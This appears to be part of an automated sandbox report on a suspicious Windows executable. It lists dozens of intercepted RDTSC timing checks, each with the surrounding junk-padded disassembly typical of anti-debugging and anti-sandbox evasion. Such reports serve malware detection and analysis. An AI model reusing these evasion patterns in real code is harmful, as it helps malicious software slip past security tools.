Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C91589 second address: C915A4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FF4D46D40BEh 0x00000008 pop ebx 0x00000009 pushad 0x0000000a jg 00007FF4D46D40B6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C915A4 second address: C915AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C94819 second address: C94823 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF4D46D40BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C94980 second address: C94987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C94987 second address: C9498C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C9498C second address: C94998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FF4D529DDE6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C94D99 second address: C94DA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C94DA2 second address: C94DA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C94EEF second address: C94EF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C94EF3 second address: C94F1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FF4D529DDE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FF4D529DDF2h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 je 00007FF4D529DDE6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C94F1E second address: C94F31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FF4D46D40BBh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C95196 second address: C9519C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C9DFD5 second address: C9DFD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C9DFD9 second address: C9DFEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007FF4D529DDE6h 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C9C0C4 second address: C9C0D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007FF4D46D40B6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C9C0D1 second address: C9C0F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007FF4D529DDE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF4D529DDF0h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C9C0F0 second address: C9C0F5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C9C9F5 second address: C9CA16 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FF4D529DDF7h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C9CA16 second address: C9CA20 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF4D46D40B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C9CF9C second address: C9CFDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D529DDF2h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FF4D529DDF7h 0x00000013 pop edi 0x00000014 pushad 0x00000015 jmp 00007FF4D529DDEDh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C9CFDF second address: C9CFE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CA2AF1 second address: CA2AF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CA2AF5 second address: CA2AF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CA2AF9 second address: CA2AFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CA2AFF second address: CA2B0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF4D46D40BCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CA2B0F second address: CA2B13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CA2B13 second address: CA2B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FF4D46D40D0h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CA5F91 second address: CA5F95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CA5F95 second address: CA5F99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CA5F99 second address: CA5FA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CAC0E7 second address: CAC101 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF4D46D40C6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CAC101 second address: CAC131 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF4D529DDE6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnc 00007FF4D529DDF2h 0x00000016 jmp 00007FF4D529DDEEh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CAC131 second address: CAC15E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FF4D46D40BFh 0x00000008 jmp 00007FF4D46D40C6h 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CAC15E second address: CAC164 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CABF7D second address: CABFBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF4D46D40B6h 0x0000000a push edx 0x0000000b jmp 00007FF4D46D40C7h 0x00000010 jnc 00007FF4D46D40B6h 0x00000016 pop edx 0x00000017 pushad 0x00000018 jmp 00007FF4D46D40C0h 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f push edi 0x00000020 pop edi 0x00000021 popad 0x00000022 push edi 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CB35AE second address: CB35B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CB35B2 second address: CB35BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CB35BC second address: CB35C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CB36CF second address: CB36F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FF4D46D40C6h 0x0000000b popad 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CB36F4 second address: CB36F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CB5CCE second address: CB5CD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CB878E second address: CB87A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D529DDF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CB87A9 second address: CB87B6 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF4D46D40B8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CC6B41 second address: CC6B74 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF4D529DDFDh 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FF4D529DDF5h 0x0000000f jl 00007FF4D529DDEEh 0x00000015 jl 00007FF4D529DDE6h 0x0000001b pushad 0x0000001c popad 0x0000001d pop edx 0x0000001e pop eax 0x0000001f pushad 0x00000020 push esi 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CC6B74 second address: CC6B81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jo 00007FF4D46D40BCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CCABB9 second address: CCABC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jnl 00007FF4D529DDE6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CCABC8 second address: CCABCD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CCABCD second address: CCABD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CCABD7 second address: CCABEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jp 00007FF4D46D40B8h 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CD100C second address: CD1012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CD1012 second address: CD1016 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CD1016 second address: CD102E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FF4D529DDECh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CD1467 second address: CD146B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CD1794 second address: CD17B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D529DDF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jc 00007FF4D529DDE6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CD17B7 second address: CD17C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push edx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CD191A second address: CD191E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CD191E second address: CD1928 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF4D46D40B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CD1928 second address: CD1946 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF4D529DDF3h 0x00000008 je 00007FF4D529DDE6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CD1946 second address: CD195D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF4D46D40BBh 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CD195D second address: CD1963 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CD1963 second address: CD1967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CD1967 second address: CD197F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF4D529DDF0h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CD23B1 second address: CD23B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CD3C9F second address: CD3CA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CD3CA5 second address: CD3CAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CD5280 second address: CD5287 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CE54E3 second address: CE54EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FF4D46D40B6h 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CF6087 second address: CF60BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jl 00007FF4D529DDE6h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 jmp 00007FF4D529DDEFh 0x00000019 jmp 00007FF4D529DDEEh 0x0000001e popad 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CF8D7D second address: CF8D8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CF8D8A second address: CF8DA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007FF4D529DDE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FF4D529DDE6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CF8DA0 second address: CF8DA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CF8A73 second address: CF8A92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF4D529DDF6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CF8A92 second address: CF8A96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: CF8A96 second address: CF8AAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FF4D529DDE6h 0x0000000e jp 00007FF4D529DDE6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: D11FAC second address: D11FBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FF4D46D40BCh 0x0000000c jnl 00007FF4D46D40B6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: D10F94 second address: D10F9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: D10F9A second address: D10F9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: D1364C second address: D13665 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a jne 00007FF4D529DDE6h 0x00000010 popad 0x00000011 je 00007FF4D529DDECh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: D13665 second address: D13684 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FF4D46D40C9h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: D13684 second address: D136B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D529DDEBh 0x00000007 jmp 00007FF4D529DDF7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jno 00007FF4D529DDE6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: D15EDA second address: D15EDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: D17A78 second address: D17A84 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: D17A84 second address: D17A88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53A0D35 second address: 53A0D51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF4D529DDF7h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53A0D51 second address: 53A0DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007FF4D46D40C5h 0x0000000f add esi, 2A6BBED6h 0x00000015 jmp 00007FF4D46D40C1h 0x0000001a popfd 0x0000001b movzx ecx, di 0x0000001e popad 0x0000001f xchg eax, ebp 0x00000020 pushad 0x00000021 jmp 00007FF4D46D40C9h 0x00000026 mov ax, C027h 0x0000002a popad 0x0000002b mov ebp, esp 0x0000002d jmp 00007FF4D46D40BAh 0x00000032 pop ebp 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FF4D46D40C7h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53E0E4E second address: 53E0E54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53E0E54 second address: 53E0ED1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D46D40BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushad 0x0000000e mov ebx, eax 0x00000010 call 00007FF4D46D40C6h 0x00000015 pop eax 0x00000016 popad 0x00000017 pushfd 0x00000018 jmp 00007FF4D46D40BBh 0x0000001d sub eax, 32B8D8BEh 0x00000023 jmp 00007FF4D46D40C9h 0x00000028 popfd 0x00000029 popad 0x0000002a push eax 0x0000002b jmp 00007FF4D46D40C1h 0x00000030 xchg eax, ebp 0x00000031 pushad 0x00000032 movsx edx, ax 0x00000035 popad 0x00000036 mov ebp, esp 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53E0ED1 second address: 53E0ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53E0ED5 second address: 53E0ED9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53E0ED9 second address: 53E0EDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
